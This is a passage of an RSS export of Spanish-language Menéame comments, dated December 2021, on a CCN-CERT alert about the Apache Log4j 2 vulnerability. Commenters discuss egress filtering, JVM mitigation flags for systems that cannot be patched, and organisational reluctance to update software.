		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#12 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c012#c-12</link>
		<pubDate>Tue, 14 Dec 2021 10:10:21 +0000</pubDate>
		<dc:creator>xkill</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c012#c-12</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-8" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c08#c-8" rel="nofollow">#8</a> si por lo que sea no podéis parchear: ir mirando qué problema político/humano hay detrás, puede que lo mejor sea no hacer nada. El responsable de que no se pueda parchear no tardará en caer, pero intenta que quede constancia de quién es el responsable de que no se pueda parchear.</p><p>&#187;&nbsp;autor: <strong>xkill</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539800</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>11</meneame:order>
		<meneame:user>xkill</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#11 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c011#c-11</link>
		<pubDate>Tue, 14 Dec 2021 10:07:58 +0000</pubDate>
		<dc:creator>xkill</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c011#c-11</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-2" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c02#c-2" rel="nofollow">#2</a> eso eso, tu aplica listas a la salida, y deja la entrada libre.... Ya verás que risas!</p><p>&#187;&nbsp;autor: <strong>xkill</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539771</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>10</meneame:order>
		<meneame:user>--59291--</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>20</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#10 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c010#c-10</link>
		<pubDate>Tue, 14 Dec 2021 10:03:57 +0000</pubDate>
		<dc:creator>--59291--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c010#c-10</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-9" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c09#c-9" rel="nofollow">#9</a> O que no se actualizan porque negocio no quiere dedicar recursos o sacar personal de otros equipos para solucionar algo que &#34;ya funciona correctamente&#34; o que no da dinero, o ninguna ventaja sobre la competencia.<br />
<br />
Eso es asi.</p><p>&#187;&nbsp;autor: <strong>--59291--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539755</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>9</meneame:order>
		<meneame:user>Pablosky</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>14</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#9 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c09#c-9</link>
		<pubDate>Tue, 14 Dec 2021 10:02:35 +0000</pubDate>
		<dc:creator>Pablosky</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c09#c-9</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-5" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c05#c-5" rel="nofollow">#5</a> Sobre todo esas versiones del año catapún que no actualiza nadie, &#34;¿paque?&#34;, si esto lo tenemos en la red interna tras el firewall.</p><p>&#187;&nbsp;autor: <strong>Pablosky</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539744</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>8</meneame:order>
		<meneame:user>--59291--</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>3</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#8 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c08#c-8</link>
		<pubDate>Tue, 14 Dec 2021 10:01:22 +0000</pubDate>
		<dc:creator>--59291--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c08#c-8</guid>
		<description><![CDATA[<p>Asimismo, si por lo que sea no podéis parchear. Estas dos propiedades de Java os deberían salvar el culo:<br />
<br />
-Dlog4j2.disable.jmx=true -Dlog4j2.formatMsgNoLookups=true</p><p>&#187;&nbsp;autor: <strong>--59291--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539703</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>7</meneame:order>
		<meneame:user>heffeque</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>11</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#7 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c07#c-7</link>
		<pubDate>Tue, 14 Dec 2021 09:57:13 +0000</pubDate>
		<dc:creator>heffeque</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c07#c-7</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-4" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c04#c-4" rel="nofollow">#4</a> ¡Muy grande la aportación!</p><p>&#187;&nbsp;autor: <strong>heffeque</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539699</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>6</meneame:order>
		<meneame:user>hynreck</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>32</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#6 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c06#c-6</link>
		<pubDate>Tue, 14 Dec 2021 09:57:02 +0000</pubDate>
		<dc:creator>hynreck</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c06#c-6</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-3" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c03#c-3" rel="nofollow">#3</a> No, se refiere a salida.. un servidor web normalmente no tiene por que tener salida sin filtrar a internet este exploit fuerza a que el servidor web se conecte a un host remoto y ejecute el programa allí alojado, si no hay salida a internet no podrá (y un servidor web solo necesita que el cliente llegue a el, no devolver la conexión)</p><p>&#187;&nbsp;autor: <strong>hynreck</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539690</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>5</meneame:order>
		<meneame:user>--59291--</meneame:user>
		<meneame:votes>4</meneame:votes>
		<meneame:karma>32</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#5 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c05#c-5</link>
		<pubDate>Tue, 14 Dec 2021 09:55:58 +0000</pubDate>
		<dc:creator>--59291--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c05#c-5</guid>
		<description><![CDATA[<p>Acordaos de Elasticsearch... <img data-src="https://cdn.mnmstatic.net/v_149/img/menemojis/36/shit.png" alt=":shit:" title=":shit:" width="18" height="18" src="https://cdn.mnmstatic.net/v_149/img/g.gif" class="emoji lazy" /></p><p>&#187;&nbsp;autor: <strong>--59291--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539677</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>4</meneame:order>
		<meneame:user>--587023--</meneame:user>
		<meneame:votes>6</meneame:votes>
		<meneame:karma>43</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#4 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c04#c-4</link>
		<pubDate>Tue, 14 Dec 2021 09:55:00 +0000</pubDate>
		<dc:creator>--587023--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c04#c-4</guid>
		<description><![CDATA[<p>[Usuario deshabilitado]</p><p>&#187;&nbsp;autor: <strong>--587023--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539650</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>3</meneame:order>
		<meneame:user>SergioZgz</meneame:user>
		<meneame:votes>0</meneame:votes>
		<meneame:karma>10</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#3 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c03#c-3</link>
		<pubDate>Tue, 14 Dec 2021 09:53:22 +0000</pubDate>
		<dc:creator>SergioZgz</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c03#c-3</guid>
		<description><![CDATA[<p><a class="tooltip c:3595568-2" href="https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c02#c-2" rel="nofollow">#2</a> yo lo entiendo como el trafico entrante no el saliente (pero vamos que el concepto esta claro)</p><p>&#187;&nbsp;autor: <strong>SergioZgz</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539567</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>2</meneame:order>
		<meneame:user>--652706--</meneame:user>
		<meneame:votes>2</meneame:votes>
		<meneame:karma>29</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#2 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c02#c-2</link>
		<pubDate>Tue, 14 Dec 2021 09:45:15 +0000</pubDate>
		<dc:creator>--652706--</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c02#c-2</guid>
		<description><![CDATA[<p><i>Aplicar listas blancas en la salida de internet en caso de duda de estar usando la librería log4j</i><br />
Creo que este consejo es el que te puede salvar de más 0-day. <br />
<br />
&#34;Da igual&#34; si tu servidor es vulnerable, si no puede descargarse el código malicioso porque simplemente no puede conectarse al exterior.<br />
Sea esta vulnerabilidad o cualquier otra q aparezca mañana<br />
<br />
Obviamente... a actualizar lo antes posible, pero controlar el tráfico saliente de los servidores accesibles desde Internet debería estar en las prioridades de los administradores</p><p>&#187;&nbsp;autor: <strong>--652706--</strong></p>]]></description>
	</item>

	<item>
		<meneame:comment_id>34539052</meneame:comment_id>
		<meneame:link_id>3595568</meneame:link_id>
		<meneame:order>1</meneame:order>
		<meneame:user>Dene</meneame:user>
		<meneame:votes>1</meneame:votes>
		<meneame:karma>23</meneame:karma>
		<meneame:url>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2</meneame:url>
		<title>#1 CCN-CERT AL 09/21 Vulnerabilidad en Apache Log4j 2 [Recomendaciones]</title>
		<link>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c01#c-1</link>
		<pubDate>Tue, 14 Dec 2021 08:38:02 +0000</pubDate>
		<dc:creator>Dene</dc:creator>
		<guid>https://www.meneame.net/m/Tecnología/ccn-cert-09-21-vulnerabilidad-apache-log4j-2/c01#c-1</guid>
		<description><![CDATA[<p>La de servidores que van a caer con esta vulnerabilidad.....</p><p>&#187;&nbsp;autor: <strong>Dene</strong></p>]]></description>
	</item>

</channel>
</rss>
